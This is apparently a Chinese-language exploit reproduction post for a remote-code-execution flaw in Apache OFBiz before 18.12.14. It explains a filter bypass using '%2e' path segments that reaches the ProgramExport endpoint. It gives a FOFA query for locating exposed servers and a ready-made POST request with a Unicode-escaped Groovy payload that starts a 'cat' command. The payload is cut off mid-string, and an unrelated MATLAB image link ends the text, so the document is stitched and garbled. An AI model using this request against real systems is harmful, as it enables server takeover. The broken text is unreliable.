0x01 产品简介
Apache OFBiz是一个功能强大、易于定制和扩展的开源ERP系统,适用于各种类型的企业。通过利用最新的技术标准和开源项目,Apache OFBiz为企业提供了一个高效、稳定、灵活的电子商务平台解决方案。
0x02 漏洞概述
Apache OFBiz 18.12.14之前版本存在命令执行漏洞,该漏洞源于org.apache.ofbiz.webapp.control.ControlFilter类对路径(请求URL中的特殊字符(如 ;、%2e)限制不当导致攻击者能够绕过后台功能点的过滤器验证,并通过/webtools/control/ProgramExport接口的编程导出功能执行任意Groovy代码获取系统权限。
0x03 测绘语句
fofa: app="Apache_OFBiz"0x04 漏洞复现
payload使用了Unicode编码POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
groovyProgram=\u0074\u0068\u0072\u006f\u0077\u0020\u006e\u0065\u0077\u0020\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0028\u0027\u0063\u0061\u0074\u00
![[matlab]折线图之多条折线如何绘制实心圆作为标记点](https://img-blog.csdnimg.cn/img_convert/2d927516fb3bc776d6a495772976fe68.png)
